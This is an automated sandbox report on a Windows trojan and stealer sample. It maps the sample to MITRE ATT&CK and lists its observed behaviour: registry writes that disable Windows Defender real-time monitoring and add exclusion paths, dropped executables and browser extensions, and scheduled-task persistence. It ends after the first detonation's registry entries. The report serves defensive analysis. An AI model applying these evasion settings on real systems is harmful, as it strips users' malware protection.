Malware Analysis Report

2024-09-11 13:31

Sample ID 240613-3jlnwsyhjn
Target 8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5
SHA256 8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5
Tags
discovery evasion execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5

Threat Level: Known bad

The file 8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5 was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution spyware stealer trojan

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Checks installed software on the system

Drops Chrome extension

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-13 23:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 23:32

Reported

2024-06-13 23:37

Platform

win7-20240508-en

Max time kernel

207s

Max time network

207s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wpmocubwzvTKZWVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oGdIbQIKIHUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hkBthRLftwjEC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prAQyJMeU = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\prAQyJMeU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hkBthRLftwjEC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zNBDoCPwUgCU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zNBDoCPwUgCU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\wpmocubwzvTKZWVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HKomOEKiubDeyUja = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oGdIbQIKIHUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\oGdIbQIKIHUn\RsjyXVV.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\LuTejtX.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\GRAMqk.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\apWjStS.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\ENSCKpN.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\OGSRWAnMlqBkg.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\QySPxOf.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\FBOYFfS.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\CgUbEFL.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bcicWGWSPuqTxjDSpV.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\emrEEeoVdUigmulhl.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\rbzCIowvsKWRrhO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\EXxaHtUqjXkXqVrbU.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecision = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000000677c06eabdda01 C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0034000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0088b506eabdda01 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C} C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecision = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\8e-88-f3-84-af-8e C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecisionTime = 8050724ceabdda01 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecisionTime = a04b774aeabdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
